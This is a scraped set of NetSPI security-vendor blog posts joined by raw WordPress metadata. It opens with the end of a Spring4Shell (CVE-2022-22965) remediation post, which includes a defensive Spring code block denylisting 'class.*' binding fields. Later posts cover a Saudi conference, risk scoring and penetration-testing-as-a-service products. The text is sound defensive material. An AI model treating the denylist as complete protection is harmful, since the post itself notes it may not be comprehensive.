Additionally, NetSPI has optimized our Attack Surface Management (ASM) platform to detect Spring4Shell at scale and in unique scenarios. Our team of expert pentesters, researchers, developers, among others, research, triage, and discover new vulnerabilities daily. As they are disclosed, new vulnerabilities are added to our ASM platform for continuous monitoring. For our current external network penetration testing customers, we have updated our processes to include Spring4Shell testing for in-scope projects. 

As ubiquitous vulnerabilities like Log4Shell and Spring4Shell become more prevalent, understanding your attack surface has never been more important. Those that proactively and continuously monitor and inventory their attack surface will be in better shape to find and address vulnerable instances of Spring Framework in a fast and comprehensive manner. 

Spring4Shell Remediation 

The Spring Framework team has since released fixes to the vulnerability. Make sure you update to Spring Framework 5.3.18 and 5.2.20 or greater. 

Where that isn’t possible, the following code can be added to secure parameter bindings, although Spring themselves notes this might not be comprehensive in every circumstance.  

@ControllerAdvice 
@Order(Ordered.LOWEST_PRECEDENCE) 
public class BinderControllerAdvice { 
 
    @InitBinder 
    public void setAllowedFields(WebDataBinder dataBinder) { 
         String[] denylist = new String[]{"class.*", "Class.*", 
         "*.class.*", "*.Class.*"}; 
         dataBinder.setDisallowedFields(denylist); 
    } 
 
} 

If you are running older Spring Framework versions or can’t make the update, Spring published these workarounds for you.  

Additionally, Apache Tomcat, one of the preconditions, released new versions to close the attack vector on Tomcat’s side. In their post, they point to the importance of having multiple mitigation options that “provide flexibility and layered protection.” 

When seemingly critical vulnerabilities like Spring4Shell are brought to light, it’s important to identify reliable resources and peers that can help you understand the vulnerability nuances.  

We hope this blog helped you better understand the vulnerability, its impact, and your options for detection and remediation. NetSPI is available to walk through our detection process and help you navigate the complexities this vulnerability presents. Please contact us to learn more. 

Do you use vulnerable versions of the Spring Framework?

[post_title] => Navigating the Complexities of Spring4Shell [CVE-2022-22965] [post_excerpt] => Explore the intricacies of Spring4Shell discovery and remediation and learn how the vulnerability [CVE-2022-22965] may impact you. [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => spring4shell [to_ping] => [pinged] => [post_modified] => 2023-06-12 13:45:20 [post_modified_gmt] => 2023-06-12 18:45:20 [post_content_filtered] => [post_parent] => 0 [guid] => https://www.netspi.com/?p=27620 [menu_order] => 285 [post_type] => post [post_mime_type] => [comment_count] => 0 [filter] => raw ) [5] => WP_Post Object ( [ID] => 26810 [post_author] => 65 [post_date] => 2021-12-07 07:00:00 [post_date_gmt] => 2021-12-07 13:00:00 [post_content] =>

Shortly after Thanksgiving, we packed our bags and ventured off to Riyadh, Saudi Arabia for the inaugural @Hack cybersecurity event. We were invited to exhibit at the SecureLink booth, who we recently partnered with to expand NetSPI’s services to the Middle East and Africa (MEA).

Over the past two years, the Kingdom of Saudi Arabia has gone through accelerated digital transformation, driven heavily by its Vision 2030 reform plan. And with this digital transformation, comes expanded attack surfaces and more exposure to cyber threats. This was a key theme and concern during the event – and a large part of why the event was organized in the first place.

It was exciting to see the energy and enthusiasm around technology and cybersecurity (almost as exciting as when we realized that @Hack was synonymous with “attack”). @Hack organizers estimated that more than 14,000 people from 70 countries were in attendance, many of which we spoke to at the NetSPI stand about the state of security in Saudi Arabia, penetration testing, cybersecurity education, cybersecurity jobs, and more.

As we packed up to head to our next destinations, we took time to reflect on our conversations, the people we met, and the key themes we observed on the show floor.

Cybersecurity Maturity in the Kingdom of Saudi Arabia

The Kingdom of Saudi Arabia has only recently focused on transforming their technological infrastructure and has invested in becoming a technological powerhouse in the region. At the conference itself, we saw the use of QR codes, mobile payments, digital sharing of contact information, and more. Although their technology adoption is very high, there is an opportunity for the region to mature its understanding of and focus on cybersecurity challenges.

One of the younger attendees came from Egypt and participated in the “bug bounty” challenge. He came in 2nd place and mentioned how the challenge to him was simple compared to what he was used to in his home country. To us, this indicates that security is not necessarily at the forefront of Saudi Arabia’s considerations when acquiring or deploying technology, and there is some catching up it needs to do to ensure security keeps pace with its technological developments.

We also recognized that most of the cybersecurity work performed is based on what is mandated by the Kingdom of Saudi Arabia government. Penetration testing services are not a large part of that discussion today, but we anticipate security testing activities – pentesting, secure code review, threat modeling, red team, design reviews – will be part of the requirements very soon.

The State of Penetration Testing

At the event, we were surprised to hear that the concept of penetration testing is new to most people and organizations in the region. In many of our conversations, we heard that they were interested in purchasing products and software solutions that could take care of all security concerns. But, as we know, even the largest technology companies can make security mistakes (see: Microsoft Azure CVE-2021-4306).

There were a number of misconceptions about penetration testing that we helped to address at the show. Notably, the difference between penetration testing and simply running an automated scanner tool or a monitoring solution.

The explosion in technology adoption over the last few years has caused many companies to rapidly seek new and innovative security solutions, however, the adoption of pentesting services in the Middle East will be largely driven by regulation.

Youth and Women in Cybersecurity

@Hack brought a diverse group of people together. Students as young as 11 stopped by our booth and were eager to learn from us. It was incredible to see the younger generation’s interest in cybersecurity careers and education. Questions we were asked include, “how can we learn more?”, “where can I find more resources?”, “what resources should I look at to become a pentester?”, and “can you hire me and train me?”

A large portion of those coming into the industry are students who have learned from global online communities, including bug bounties, capture the flag, and online forums. For continued reading, this Arab News article highlights some of the young attendees involved at the event.

Across the globe, there are initiatives to get women more involved in cybersecurity. Cybersecurity Ventures and WiCys predict that women will hold 25 percent of cybersecurity jobs globally by the end of 2021, up from 20 percent in 2019. This was evident @Hack.

Women were equally, if not more, involved at the conference than their male counterparts in terms of communication, interest, types of questions they were asking, etc. The transition to more progressive ideologies in the region has clearly resulted in a large influx of highly educated and motivated women wanting to break into the space.

Overall, the event was a great opportunity to connect and share information with security peers across the globe and we hope they will put on @Hack next year. With our new SecureLink partnership, we’re excited to continue educating the region on the benefits of penetration testing and the value it brings when done well. Want to connect with us at the next big cybersecurity event? We’re heading to RSA Conference in San Francisco, February 7-10, 2022. Schedule a meeting with us!

Explore our penetration testing, adversary simulation, and attack surface management services.
[post_title] => @Hack: Cybersecurity Transformation in Saudi Arabia [post_excerpt] => Read highlights and lessons learned from the 2021 @Hack cybersecurity conference in the Kingdom of Saudi Arabia. [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => athack-cybersecurity-transformation-saudi-arabia [to_ping] => [pinged] => [post_modified] => 2023-01-23 15:11:04 [post_modified_gmt] => 2023-01-23 21:11:04 [post_content_filtered] => [post_parent] => 0 [guid] => https://www.netspi.com/?p=26810 [menu_order] => 336 [post_type] => post [post_mime_type] => [comment_count] => 0 [filter] => raw ) [6] => WP_Post Object ( [ID] => 26115 [post_author] => 31 [post_date] => 2021-08-10 07:00:00 [post_date_gmt] => 2021-08-10 12:00:00 [post_content] =>

Gartner anticipates that, by 2022, organizations that use a risk-based vulnerability management process will experience 80% fewer breaches. So, how can an organization make this shift and achieve a risk-based vulnerability management program? Two words: Risk scoring.

Leveraging risk scores for remediation prioritization and quantifying risk allows companies to prioritize budgets and resource allocation and focus on the security activities that could have the greatest impact to their business. And the idea of incorporating risk scoring intelligence to make the shift to a risk-based vulnerability management program is evolving. 

Through the collaboration of NetSPI’s development, engineering, and product teams, we’ve uncovered an accurate, data-driven methodology to calculate both aggregate and vulnerability risk scores using the data available from our penetration testing and vulnerability management platform, Resolve™. Let’s dig deeper.

What is risk scoring? 

In its most abstract form, risk is “the effect of uncertainty on objects involving exposure to danger.” At its foundation, cyber security risk is ultimately a function of (threat x vulnerability). While the definitions are helpful, it is important to look at your security program with a new lens and assess how your organization quantifies its risk – and is it even important to do so? Simply, the answer is yes. Quantifying and measuring cybersecurity risk is one of the most important components to a successful risk-based vulnerability management program.

The evolution of risk-based vulnerability management

Vulnerability incident resolution used to be reactive. Companies would wait for something to be exploited, then fix it. As IT systems became more integral to business operations, the need to be proactive in cyber defense became evident. Many tools have been developed that can hastily provide a list of vulnerabilities, but companies were quickly overwhelmed and overloaded with the number of identified vulnerabilities without direction or priority assigned for remediation. 

The introduction of Governance, Risk, and Compliance (GRC) software that could correlate all vulnerabilities aligned to business controls and identify the “true risks” to the company allowed some prioritization of risk. This management activity was done through technology in a system without human touch, lacking real world controls and exceptions. This caused the technologies to be complicated, difficult to implement, and require extensive customization. The latest vulnerability management market entrants are touting their ability to utilize AI to try and predict an exploit before it ever happens. But organizations are spending a lot of money on this technology, and it’s hard to predict. The usage of AI and other automated tools opaquely calculates the likelihood of a vulnerability exploit and offers limited customization to the companies using the technology. 

Today, the gold standard is a risk-based vulnerability management program. One where we prioritize vulnerability remediation efforts based on the true risk it presents to your specific organization, as opposed to a program that focuses purely on compliance "check the box" activities or a program that is so overwhelmed it remediates vulnerabilities ad-hoc as they show up, as opposed to appropriately prioritizing them.

For more insights, watch our webinar: The Evolution of Risk-Based Vulnerability Management.

How to use your risk score metrics to help find, prioritize, and fix vulnerabilities

Risk scoring allows companies to manage their evolving attack surface unlike they were able to before. The first step is to develop a customized risk lifecycle that will be the foundation on which risk data is generated. This includes identifying both the external and internal threats and vulnerabilities, as well as the assets that could be attacked. The decision then must be made on the best course of treatment, with options including mitigating, transferring, or accepting the risk. 

Here are the seven factors that impact how risk scores are determined in our Resolve™ platform:

  • Impact – If this vulnerability was to be exploited, how severe would it’s impact be? 
  • Likelihood – How likely is it that an attacker can and will attack this space? 
  • Environmental Modifiers – Think broadly about the asset and the environment in which the vulnerability is located.
  • Temporal Modifiers – Focuses on exploit code maturity, confidence, and remediation requirements. Temporal modifiers bring your risk score to life.
  • Industry Comparisons – How does your risk compare to other organizations or peers in your sector? 
  • Threat Actors – Are threat actors actively exploiting vulnerabilities present in your environment? 
  • Remediation Risk – Using the remediation SLAs available through PTaaS, all vulnerabilities are automatically assigned customizable due dates. Use remediation risk to determine your aggregates that require attention from a compliance perspective.

Vulnerability risk scoring is particularly beneficial in terms of remediation prioritization as it is calculated when you look at (vulnerability risk x the cost of resolution). If the vulnerability is deemed high severity, but the impact on your business is low (if exploited), the risk score would be on the lower side, and it may not be worth spending the money to fix it. And vice versa.

When it comes time to put your risk score to use, here are a few remediation considerations to keep in mind:

  • Prioritize – Prioritization is the most difficult part. Companies today can effectively identify vulnerabilities through penetration testing services, but how do they figure out which ones to fix first? What are the true risks to the business? This will vary depending on your business. 
  • Evaluate – Organizations must understand the efficacy of their risk mitigating controls. Manual pentesting and vulnerability scans still need to be done to validate your efforts are working as intended. 
  • Utilize the Data – Once you have a risk score, use it to validate and drive decisions around resource allocation, remediation prioritization, spend validation, track risk over time, industry benchmarking, and more.
  • Effectiveness – Are you on track to remediate your vulnerabilities before any threat materializes? Are your vulnerability and aggregate risk scores improving over time?

We see it every day. Companies are facing an immense number of vulnerabilities that humans have to manually sift through to assess and prioritize. Having a risk-based vulnerability management program in place allows organizations to identify, prioritize and remediate risks within their organization, saving time, headaches, and – perhaps most importantly – dollars in the end. 

[post_title] => The Secret to a Successful Risk-Based Vulnerability Management Program: Risk Scoring [post_excerpt] => Learn why risk scoring can help organizations achieve a risk-based vulnerability management program and, in turn, experience 80% fewer breaches. [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => secret-to-risk-based-vulnerability-management-program-risk-scoring [to_ping] => [pinged] => [post_modified] => 2022-12-16 10:51:55 [post_modified_gmt] => 2022-12-16 16:51:55 [post_content_filtered] => [post_parent] => 0 [guid] => https://www.netspi.com/?p=26115 [menu_order] => 375 [post_type] => post [post_mime_type] => [comment_count] => 0 [filter] => raw ) [7] => WP_Post Object ( [ID] => 25368 [post_author] => 53 [post_date] => 2021-05-13 07:00:49 [post_date_gmt] => 2021-05-13 07:00:49 [post_content] =>
Watch Now

Overview  

Over time, the way we view cyber security risk has evolved the penetration testing industry. What once was a static laundry list of vulnerabilities to remediate is now a risk-based vulnerability management program. Modern penetration testing should provide more than a list of vulnerabilities. To be effective, it must guide organizations to effectively prioritize the vulnerabilities, assets, networks, etc. that pose the highest risk to the business. 

In this webinar, NetSPI’s product team, Jake Reynolds and Cody Chamberlain, will discuss how risk has evolved in penetration testing services, the role of risk scoring in intelligent prioritization of security activities, the factors that impact a risk score, and pragmatic steps to take after you receive a risk score

Key Highlights:

  • 2:18 – What is risk? 
  • 8:07 – Evolution of risk assessment 
  • 12:34 – How risk scores are created 
  • 21:49 – NetSPI’s risk scoring 

What is Risk? 

At its most abstract form, risk is the effect of uncertainty on objectives. From an information security and cyber IT perspective, organizations have defined risk as threat times vulnerability, if there is no threat, but you're vulnerable, there’s no risk. On the other hand, if a lot of threats and threat actors are attacking an organization, but the organization doesn't have vulnerabilities to exploit, there’s also no risk.  

The risk lifecycle includes:

  • Context to identify risk tolerance, people, and processes 
  • Identification of vulnerabilities, threats, and assets 
  • Assessment using the risk equals threat times vulnerability formula to determine risk likelihood, impact, and asset value 
  • Treatment by mitigating, transferring, or accepting the risk  
Download How to Use Risk Scoring to Propel Your Risk-Based Vulnerability Management Program Forward

Evolution of Risk Assessment 

The evolution of risk assessment refers to how an organization has dealt with a specific problem or vulnerability in the past. Originally, it may have been as simple as responding to a problem and fixing it. As IT systems became more important and integral to business processes, organizations realized the need to start proactively identifying the vulnerabilities. 

Some steps in the evolution of risk assessment have included:

  • Respond to it and fix it: Wait for a problem or vulnerability to happen and fix it. 
  • Let GRC solve it: Send the risk to an application that will correlate all vulnerabilities aligned to controls and identify the “true risks” to the company. 
  • Find the vulnerabilities: Proactively finding vulnerabilities and fixing them regardless of the compensating controls, threat actor analysis, or asset value – just fix it. 
  • Trust us, it works: This includes the use of artificial intelligence (AI) and other tools or efforts to opaquely calculate the likelihood of exploiting a vulnerability.   

While risk assessment is now more effective than it was in the past, organizations still face an immense number of vulnerabilities that they have to sift through and prioritize. Risk-based vulnerability management providers are more effectively integrating threat intelligence than in the past. But there’s always an opportunity for more organizations to embrace threat intelligence. 

How to Use Risk Scores 

A lot of information and criteria go into calculating a risk score, along with many different equations. Once you have a risk score, the next step is figuring out how to use it. The best risk score is one that you can sort by a numeric value. For example, the top score is your worst vulnerability or your most important asset that you need to focus on and start remediating immediately.  

At NetSPI, we expose the top risk score in a few different ways using our risk scoring methodology, but ultimately, you can simply sort the risk scores, select the top item, and begin remediation.

An effective methodology also splits risk scoring into two distinct categories. One is vulnerability specific risk scoring and the other is aggregate risk scoring, meaning taking a group of vulnerabilities and assigning a score to them. 

Metrics to measure vulnerability risk scoring include:

  • Impact takes into consideration how detrimental the impact of a vulnerability would be on an organization, including monetary, brand, and industry specific impact.  
  • Likelihood measures how likely a vulnerability is to be exploited. 
  • Environmental factors, such as whether different compensating controls exist within the environment, whether public exploit code is available, and whether the affected asset has access to PII or PHI. 

Aggregate risk scoring factors include:

  • Vulnerability intelligence: How does this specific combination of vulnerabilities affect your business?  
  • Industry comparisons: How does your risk compare to other organizations in your sector?  
  • Threat actors: Are threat actors actively exploiting vulnerabilities present in your environment?  
  • Remediation effectiveness: Are you on track to remediate your risks on time?  

NetSPI’s Risk Scoring  

NetSPI’s risk-based vulnerability management capabilities and risk scoring model focus on transparency and collaboration with our clients. Our risk scoring brings together the different aspects of risk into our platform to align with the penetration testing as a service (PTaaS) experience. Clients will not only understand how their risk scores are impacted, but they will also be able to track risk scores over time at the granular vulnerability level, the project level, and the greater organizational level. 

Other capabilities include:

  • Customization options 
  • Scalable risk scores 
  • Benchmarking against peers 
  • High-touch, high-tech through a combination of advanced technology and human expertise 

Learn more about NetSPI’s risk score methodology and how to effectively propel your risk-based vulnerability management program forward by reading this whitepaper.

[wonderplugin_video iframe="https://youtu.be/0NipyMx2Rxs" lightbox=0 lightboxsize=1 lightboxwidth=1200 lightboxheight=674.999999999999916 autoopen=0 autoopendelay=0 autoclose=0 lightboxtitle="" lightboxgroup="" lightboxshownavigation=0 showimage="" lightboxoptions="" videowidth=1200 videoheight=674.999999999999916 keepaspectratio=1 autoplay=0 loop=0 videocss="position:relative;display:block;background-color:#000;overflow:hidden;max-width:100%;margin:0 auto;" playbutton="https://www.netspi.com/wp-content/plugins/wonderplugin-video-embed/engine/playvideo-64-64-0.png"]

[post_title] => The Evolution of Risk-Based Vulnerability Management [post_excerpt] => [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => evolution-of-risk-based-vulnerability-management [to_ping] => [pinged] => [post_modified] => 2023-08-22 10:05:26 [post_modified_gmt] => 2023-08-22 15:05:26 [post_content_filtered] => [post_parent] => 0 [guid] => https://www.netspi.com/?post_type=webinars&p=25368 [menu_order] => 56 [post_type] => webinars [post_mime_type] => [comment_count] => 0 [filter] => raw ) [8] => WP_Post Object ( [ID] => 20655 [post_author] => 31 [post_date] => 2020-12-08 07:00:36 [post_date_gmt] => 2020-12-08 07:00:36 [post_content] =>

PTaas Pro is now offered as part of AppSec as a Service. Learn more about AppSec as a Service.

During our penetration testing engagements, we frequently hear from clients that it is difficult to manage the large volume of vulnerabilities we discover. While on the one hand, this is what we are hired to do, for our clients, it poses some challenges. Now, with Penetration Testing as a Service (PTaaS) we’ve made it easier than ever to consume, understand, and manage the large number of results we deliver to our clients with our penetration tests. And with PTaaS+, we’ve extended those benefits by directly integrating with your ticketing systems and allowing you to perform the full remediation lifecycle inside of Resolve™, our threat and vulnerability management platform.

What are you supposed to do when NetSPI isn’t the only source of vulnerability discovery for your organization? It’s extremely important to correlate and deduplicate vulnerabilities from all your data sources, not only to reduce noise but to save frustration from your engineering teams by reducing duplicates and false positives, and providing consistent, up-to-date guidance.

PTaaS Pro solves this problem by providing Resolve’s full suite of Threat and Vulnerability Management capabilities to our penetration testing clients. PTaaS Pro is an extremely valuable tool for security programs of all sizes, and provides many benefits, including:

Manage Internal and Third-Party Vulnerabilities

PTaaS Pro gives you the ability to manage all your organization’s vulnerabilities, not just those that NetSPI discovers. Yes, that even means vulnerabilities discovered by our competition. Resolve can integrate with over 30 vulnerability scanners, your CMDBs, and all your internal ticketing systems to have a consolidated warehouse for all vulnerabilities.

Reduce In-house Penetration Testing Times by up to 30 Percent

Resolve is a powerful tool for internal penetration testing teams, allowing them to coordinate project management for tests, standardize and enforce processes through checklists, correlate and deduplicate their automated and manual findings, and generate reports with the click of a button. One of the reasons NetSPI performs the highest quality penetration testing in the industry is because Resolve removes the hassle from testing, allowing your team to focus on finding vulnerabilities.

We’re More Than a Vendor – We’re You’re Partner

When launching PTaaS Pro with your organization, NetSPI connects you with our team of industry experts, including former CISOs, vulnerability managers, and security experts. Together we work to integrate Resolve and NetSPI into your security processes. Every step of the way you’ll have access to first-hand experience and guidance on how to optimize and improve your security program.

PTaas Pro is now offered as part of AppSec as a Service. Learn more about AppSec as a Service.

[post_title] => Introducing PTaaS Pro: The Smart Solution to Penetrating Testing and Vulnerability Management [post_excerpt] => During our penetration testing engagements, we frequently hear from clients that it is difficult to manage the large volume of vulnerabilities we discover [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => introducing-ptaas-pro-the-smart-solution-to-penetrating-testing-and-vulnerability-management [to_ping] => [pinged] => [post_modified] => 2021-05-25 14:11:09 [post_modified_gmt] => 2021-05-25 14:11:09 [post_content_filtered] => [post_parent] => 0 [guid] => https://www.netspi.com/?p=20655 [menu_order] => 448 [post_type] => post [post_mime_type] => [comment_count] => 0 [filter] => raw ) [9] => WP_Post Object ( [ID] => 20097 [post_author] => 31 [post_date] => 2020-10-22 07:00:13 [post_date_gmt] => 2020-10-22 07:00:13 [post_content] =>

The PTaaS+ features listed within this blog post are now offered with any NetSPI service that leverages PTaaS. This excludes ticketing integrations, which are available for an additional cost. Contact us to learn more.

NetSPI is focused on creating the next generation of security testing. Our Penetration Testing as a Service (PTaaS) delivers higher quality vulnerabilities, in less time than any other provider and we are now expanding these benefits into your remediation lifecycle.

This month we’re expanding your options with our PTaaS+ plan, which focuses on vulnerability management and remediation. With our base PTaaS plan, we deliver vulnerabilities the same day they are found, now with PTaaS+ you and your team are empowered to act upon and begin remediating them immediately, decreasing your time-to-remediation by up to 1 month for high severity issues. A couple of key features contribute to this new functionality:

Ticketing Integrations

On average, we report over 50 vulnerabilities on a regular web application test, that number jumps above 700 when we perform external network testing. When receiving so many vulnerabilities, making sense of it all can be a full-time job before you even get to remediating them. With PTaaS+, we offer free integration with Jira or Service Now to easily get the vulnerabilities into your tools and into the remediator’s hands on day zero.

Remediation Assignments & SLAs

After receiving a large number of vulnerabilities, the first step is assigning a due date for remediation based on vulnerability severity. PTaaS+ allows each severity to be assigned a timeframe in which it must be remediated from the delivery date. NetSPI’s standard recommendation is:

  • Critical – 30 days
  • High – 60 days
  • Medium – 90 days
  • Low – 365 days

However, these can be customized to fit your organization’s policies. Additionally, with PTaaS+, you can assign vulnerabilities to specific users, letting you track and delegate vulnerabilities throughout the remediation lifecycle.

Vulnerability Customization

After delivering vulnerabilities, one common point of discussion is NetSPI’s severity rating vs. an organization’s internal vulnerability rating. Every organization rates vulnerabilities differently and to help with that, PTaaS+ allows you to provide an assigned severity to all vulnerabilities, from which your remediation due dates can be calculated. Both NetSPI’s and your severities will be maintained for auditing and future reporting.

Data Analytics

After you have a handle on your remediation processes, you can start looking for trends to ensure fewer vulnerabilities next year. PTaaS+ grants you access to NetSPI’s Data Lab which allows you to analyze and trend vulnerabilities across all your assessments with NetSPI. Popular data lab queries include:

  • Riskiest asset in your environment
  • Most common vulnerabilities across your company
  • Top OWASP categories

The PTaaS+ features listed within this blog post are now offered with any NetSPI service that leverages PTaaS. This excludes ticketing integrations, which are available for an additional cost. Contact us to learn more.

[post_title] => Introducing PTaaS+: Decreasing Your Organization's Time to Remediation [post_excerpt] => NetSPI is focused on creating the next generation of security testing. This month we’re expanding your options with our PTaaS+ plan. [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => introducing-ptaas-plus-decreasing-your-organizations-time-to-remediation [to_ping] => [pinged] => [post_modified] => 2024-01-05 12:38:22 [post_modified_gmt] => 2024-01-05 18:38:22 [post_content_filtered] => [post_parent] => 0 [guid] => https://www.netspi.com/?p=20097 [menu_order] => 458 [post_type] => post [post_mime_type] => [comment_count] => 0 [filter] => raw ) [10] => WP_Post Object ( [ID] => 19891 [post_author] => 65 [post_date] => 2020-10-07 07:00:50 [post_date_gmt] => 2020-10-07 07:00:50 [post_content] => On October 7, NetSPI Managing Director Nabil Hannan and Product Manager Jake Reynolds were featured in Cyber Defense Magazine: With Continuous Integration/Continuous Deployment (CI/CD) increasingly becoming the backbone of the modern DevOps environment, it's more important than ever for engineering and security teams to detect and address vulnerabilities early in the fast-paced software development life cycle (SDLC) process. This is particularly true at a time where the rate of deployment for telehealth software is growing exponentially, the usage of cloud-based software and solutions is high due to the shift to remote work, contact tracing software programs bring up privacy and security concerns, and software and applications are being used in nearly everything we do today. As such, there is an ever-increasing need for organizations to take another look at their application security (AppSec) strategies to ensure applications are not left vulnerable to cyberattacks. Read the full article for three steps to get started – starting on page 65 of the digital magazine here. [post_title] => Cyber Defense Magazine: 3 Steps to Reimagine Your AppSec Program [post_excerpt] => On October 7, NetSPI Managing Director Nabil Hannan and Product Manager Jake Reynolds were featured in Cyber Defense Magazine. [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => cyber-defense-magazine-3-steps-to-reimagine-your-appsec-program [to_ping] => [pinged] => [post_modified] => 2021-05-04 17:08:43 [post_modified_gmt] => 2021-05-04 17:08:43 [post_content_filtered] => [post_parent] => 0 [guid] => https://www.netspi.com/?p=19891 [menu_order] => 463 [post_type] => post [post_mime_type] => [comment_count] => 0 [filter] => raw ) [11] => WP_Post Object ( [ID] => 19786 [post_author] => 53 [post_date] => 2020-09-10 14:52:02 [post_date_gmt] => 2020-09-10 19:52:02 [post_content] =>
Watch Now

This session was originally shown at Black Hat USA 2020.

Overview 

A successful Application Security Program requires a happy marriage between people, processes, and technology. 

In this on-demand webinar, NetSPI Field CISO Nabil Hannan and Head of Emerging Technology Jake Reynolds explore:  

  • How leading organizations use different discovery techniques as part of their AppSec program 
  • Strengths and weaknesses of common AppSec vulnerability discovery technologies 
  • Techniques that make security frictionless for your developers as they embrace a DevSecOps culture 
  • How functional your application security program can be with a “makeover” to: 
    • Enhance your reporting to empower leadership to optimize your AppSec program 
    • Improve your vulnerability ingestion, correlation, and enrichment  
    • Increase your speed to remediation 

Key highlights: 

  • 0:35 – Pre-renovation 
  • 1:28 – Application vulnerability discovery techniques  
  • 7:30 – Post-renovation 
  • 10:50 – NetSPI’s platform demo 

Pre-Renovation  

If you’re considering giving your application security program an extreme makeover, you’ll likely notice some telltale signs that your AppSec program is in need of renovation.

Some to signs include:

  • New and immature AppSec programs are reactive 
  • Security testing is performed ad-hoc 
  • Vulnerabilities and remediation efforts aren’t managed centrally 
  • Organizations face challenges conveying the value of AppSec efforts and investment  

Application Vulnerability Discovery Techniques  

When it comes to application vulnerability discovery techniques, a few traditional techniques are more commonly used while emerging ones are gaining adoption and popularity. Traditional techniques include: 

  • Static application security testing (SAST) and manual code review 
  • Dynamic application security testing (DAST) and manual pentesting 
  • Manual inventory of OSS usage  

Emerging techniques include:  

  • Interactive application security testing (IAST) 
  • Real-time application self-protection (RASP) 
  • Software composition analysis (SCA) 

Common Discovery Tool Types 

As you decide how you want to renovate your AppSec program, there are many different options to consider, including the following:

  • SAST and DAST
    • Challenging to deploy and manage in large organizations 
    • Noisy (high false positive rates out of the box)  
    • Long scan times 
    • Quality of results varies significantly between SAST and DAST products 
    • Security expertise required to interpret results and remove false positives 
  • Interactive application security testing (IAST)
    • Most popular IAST products are passive 
    • Quality of results driven by test automation and QA test coverage 
    • Easy to integrate into CI/CD pipelines 
    • Seamless to the development organization 
    • Low false positive rates
  • Real-time self-protection (RASP) 
    • Challenging to deploy and manage in large organizations 
    • The level of effort to deploy is almost the same as fixing vulnerabilities  
    • Provides protection from common vulnerabilities getting exploited
  • Software composition analysis (SCA)  
    • Identify known security vulnerabilities in components being used 
    • Doesn’t identify new vulnerabilities in source code 
    • Challenging to deploy at scale at large organizations
    • Create a bill of materials (BOM) of Open Source components 

Post-Renovation 

Once you’ve determined what’s working with your application security program and which parts need a makeover, it’s important to take the following into consideration:

  • Build a centralized system of record to manage all AppSec activities 
  • Strategize an effective approach to AppSec with multiple touchpoints 
  • Integrate technology into processes as appropriate 
  • Enable automation to assign people to strategic tasks/activities  

Next-Gen AppSec Infrastructure  

Your next-generation application security infrastructure should be built around all your testing initiatives, including SAST, DAST, IAST, RASP, and SCA. Under each type of testing activity, the infrastructure includes project management, testing, ticketing, and reporting, and remediation.  

In the middle of the infrastructure is a rock-solid threat and vulnerability management platform. NetSPI’s Resolve™ platform is built to be the warehouse of all your data and is capable of managing all of your S-SDLC in the product.  

NetSPI Can Help Make Over Your Application Security Program 

As attack surfaces continue to expand and evolve, and threat actors become more sophisticated, your AppSec program has room for improvement. Read our in-depth whitepaper, Getting Started on Your Application Security Program, to begin your journey to mature your application security program and reduce risk.

With NetSPI’s offensive security platform, your organization can improve vulnerability management, achieve penetration testing efficiencies, leverage security automation, understand your risk, scale your security program, and manage your attack surface. Learn more – schedule a demo today.

[wonderplugin_video iframe="https://youtu.be/aojAelxBXDc" lightbox=0 lightboxsize=1 lightboxwidth=1200 lightboxheight=674.999999999999916 autoopen=0 autoopendelay=0 autoclose=0 lightboxtitle="" lightboxgroup="" lightboxshownavigation=0 showimage="" lightboxoptions="" videowidth=1200 videoheight=674.999999999999916 keepaspectratio=1 autoplay=0 loop=0 videocss="position:relative;display:block;background-color:#000;overflow:hidden;max-width:100%;margin:0 auto;" playbutton="https://www.netspi.com/wp-content/plugins/wonderplugin-video-embed/engine/playvideo-64-64-0.png"]

[post_title] => Extreme Makeover AppSec Edition [post_excerpt] => Did you miss Black Hat USA 2020? Watch our webinar, "Extreme Makeover: AppSec Edition," by NetSPI's Managing Director, Nabil Hannan, and Product Manager, Jake Reynolds, on-demand now. [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => extreme-makeover-appsec-edition-black-hat-2020 [to_ping] => [pinged] => [post_modified] => 2023-07-12 13:05:46 [post_modified_gmt] => 2023-07-12 18:05:46 [post_content_filtered] => [post_parent] => 0 [guid] => https://www.netspi.com/?post_type=webinars&p=19786 [menu_order] => 70 [post_type] => webinars [post_mime_type] => [comment_count] => 0 [filter] => raw ) [12] => WP_Post Object ( [ID] => 18462 [post_author] => 31 [post_date] => 2020-04-21 07:00:16 [post_date_gmt] => 2020-04-21 07:00:16 [post_content] =>

The process of assessing third-party penetration testing vendors is the start of a long-term relationship that is core to your security testing program. It’s critical to find a vendor that can both conduct and operationalize these testing programs to scale across the smallest and largest of security organizations. This can only happen when a testing service provider is technology-enabled and can plug into any environment.

At RSA in February, NetSPI launched Penetration Testing as a Service (PTaaS). PTaaS is our unique delivery model that provides our Threat and Vulnerability Management (TVM) platform, Resolve™ to our customers on every engagement. PTaaS is designed to provide best-in-class TVM solutions, by default, for every test. Starting with the first engagement, all vulnerabilities are correlated, deduplicated, and delivered directly through Resolve™. As the testing grows, the entire suite of product functionality can be added so all of an organization’s internal and third-party testing programs can be viewable in Resolve™.

In this two-part blog, we will first review existing features that come standard with a penetration test through PTaaS. Then, in the second blog in May, we’ll discuss additional and upcoming functionality that exists to scale Resolve™ across even the largest organizations.

Program Management

The entry point into Resolve™ is the Program Management Dashboard, which helps orchestrate all testing activities that are ongoing and have been completed in the platform. At the top, you will see new vulnerabilities trending over time and by hovering over them, you can see the efficacy of each testing method. This helps identify what was found through manual penetration testing versus our proprietary multi-scanner orchestration and correlation tool, Scan Monster™, versus a traditional single network scanner.

On this same Program Management Dashboard screen, you can see the Services Overview, which aggregates all projects in Resolve™ into a matrix via Project Type and timeframe. For example, the top left card in this overview represents all Web Application Penetration Tests performed in Q1 2020. Additional detail such as scoping and vulnerability information can also be found on this card.

Projects

By clicking into one of these cards in the Services Overview, you will be taken to the Projects grid, where each project’s details can be viewed. Selecting a project will bring up all information related to that project at-a-glance, where you can view information including recent activity and comments, users assigned to the project, and project scope and definition. All communication for the project flows through this page. The project entities are also available here, along with important information like the findings discovered during the engagement and the assets that were included in the test. An asset typically relates to a unique IP address or URL.

